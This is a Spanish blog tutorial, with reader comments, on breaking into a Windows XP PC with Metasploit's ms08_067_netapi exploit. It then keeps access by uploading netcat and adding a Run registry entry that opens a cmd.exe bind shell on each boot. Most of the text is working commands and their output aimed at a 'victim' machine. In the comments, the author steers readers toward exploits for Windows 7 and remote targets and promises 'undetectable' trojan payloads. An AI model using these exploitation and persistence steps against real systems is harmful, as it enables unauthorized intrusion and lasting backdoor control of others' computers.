Tutoriales

Penetrando y Manteniendo Acceso – Metasploit + NetCat

Como penetrar en un PC y mantener el acceso creando una escucha para una shell con Netcat…

Herramientas necesarias:
NetCat
Metasploit Framework

Exploit:
ms08_067_netapi

PC Victima:
192.168.1.35

Actualizamos e iniciamos Metasploit Framework:

todo@Soluciones:~$ sudo msfupdate
todo@Soluciones:~$ sudo msfconsole

Seleccionamos, configuramos y lanzamos el exploit:

msf; use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.35
RHOST = 192.168.1.35
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
—- ————— ——– ———–
RHOST 192.168.1.35 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
— —-
0 Automatic Targeting

msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.36:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 3 – lang:Spanish
[*] Selected Target: Windows XP SP3 Spanish (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (752128 bytes) to 192.168.1.35
[*] Meterpreter session 1 opened (192.168.1.36:4444 – 192.168.1.35:1280) at 2011-10-18 16:47:12 -0300

Se nos abrio una sesion de meterpreter, supongo que los comandos basicos los sabras, cd, pwd, etc etc…
Aparte de esos vamos a usar tambien el comando upload, que es para subir archivos a la pc victima, y el comando reg, para manipular su registro.

Bien, primero nos ubicamos en nuestra PC, en donde tenemos el ejecutable del NetCat y luego lo subimos a la PC Victima:

meterpreter > lcd /media/Hacking/NetCat
meterpreter > upload nc.exe C:/Windows/System32
[*] uploading : nc.exe – C:/Windows/System32
[*] uploaded : nc.exe – C:/Windows/System32\nc.exe

Verificamos que fue subido usando el comando search

meterpreter > search -d C:/Windows/System32 -r false -f nc.exe
Found 1 result…
C:/Windows/System32\nc.exe (61440 bytes)

Perfecto, ahi esta 😉

Ahora crearemos el valor en el registro para que siempre que el sistema inicie, el NetCat nos quede escuchando con una shell… 😀

meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v ncMC -d ‘C:\Windows\System32\nc.exe -L -d -p 5544 -e cmd.exe’ Successful set ncMC

Algo en lo que la gente suele equivocarse, es en el parametro -L, que algunas personas ponen -l (L minuscula en vez de mayuscula).
Esto es casi lo mismo, la unica diferencia es que -l ejecuta el listening, pero cuando nos conectamos y luego nos desconectamos, el listening termina, en cambio con -L el listening sigue ejecutandose, podremos conectarnos y desconectarnos todas las veces que queramos y no se vera afectado.

Ahora reiniciemos el PC Victima, para que el valor en el registro surta efecto, simplemente un:

meterpreter > reboot

Ahora intentaremos conectarnos con el NetCat, para eso se debe utilizar el comando:

todo@Soluciones:~$ nc -vv 192.168.1.35 5544
Connection to 192.168.1.35 5544 port [tcp/*] succeeded!
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\System32 ipconfig
ipconfig
Configuracion IP de Windows
Adaptador Ethernet Conexion de area local :
Sufijo de conexion especifica DNS :
Direccion IP. . . . . . . . . . . : 192.168.1.35
Mascara de subred . . . . . . . . : 255.255.255.0
Puerta de enlace predeterminada : 192.168.1.1
C:\WINDOWS\System32

Y wuala, tenemos una Shell 😉
Facilito ^^

7 comentarios en «Penetrando y Manteniendo Acceso – Metasploit + NetCat»

  • Buenas,
    excelente la explicacion que haces;
    pero, solo se puede hacer en una misma red?
    y en windows 7 como es?

  • Hola Nelson, soy el autor del articulo…

    Esto es lo básico en una red LAN con el mismo rango de IP, si quieres atacar a otra PC en la WAN, pues hay que encontrar la manera de obtener un meterpreter, o entrando por otros metodos, y plantar el nc, eso ya depende de lo que sepas y lo que te la ingenies.
    Y en Windows 7, pues es lo mismo, solo que tenes que encontrar algún exploit que te sirva para explotar un Win7. El exploit que aquí se explica solo sirve para WinXP desactualizados.

    Un saludo.

  • Hola Mauro,
    Solo si puedes ayudarme claro,!!
    alguna forma de penetrar windows 7,
    he leido e investigado, que se puede hacer por medio de un backdoor, pero el exploit o la session meterpreter no me conecta, Si tu tienes alguna forma, una explicacion le agradeceria de corazon.
    Muchas gracias y que estes bien.

  • Ps ya te digo Nelson, el procedimiento es mas o menos el mismo, solo hay que encontrar el exploit indicado, ya que el que use solo sirve para un WinXP desactualizado. Te paso un par de webs donde publican vulnerabilidades, quizá con eso y un poco que busques en Google puedas encontrar y explotar alguna vuln.

    Esta es para buscar por los datos que vos le pasas: http://www.metasploit.com/modules/

    Y en esta web van publicando vulnerabilidades a diario de aplicaciones, webs, etc: http://www.exploit-db.com/

    Si esperas un par de días pondré un tuto para crear un payload y pasárselo a la victima, es como si fuera un troyano, pero mas efectivo e indetectable, que debe ser mas o menos lo que decís…

    Bueno, volviendo a lo de Win7, fíjate si en esas web encontras alguna vuln del Win7 o alguna aplicación, descarga, investiga el exploit y úsalo.

  • y si intento usar ese exploit pero atraves del wifi en vez de conectado por cable, ¿funcionaria? yo lo he comprobado con la aplicación armitage y no me funciona

  • Oscar.
    Creo que primero deberías aprender un poco más sobre como funciona esto. DESPUÉS intenta hacer lo que quieres hacer. No intentes saltarte pasos.

  • Hola Mauro, gracias por el tutorial, me esta sirviendo de mucho tu ayuda, pero tengo una pregunta, en caso de que haya conseguido sembrar un exploit a traves de una USB ¿cómo puedo mantener la sesion abierta para siempre? O más bien el haber sembrado el exploit en la pc victima por usb podre realizar cualquier tarea en la pc de la victima a la hora que yo quiera o cuando yo quiera? O solamente durante el transcurso que este sembrada la usb? De ser lo contrario, ¿como puedo reanudar la sesion de este exploit para seguir conectado a traves del puerto?

    Espero puedas ayudarme, me serviria de mucho en mis practicas y para seguir adquiriendo conocimientos, saludos y gracias!

Los comentarios están cerrados.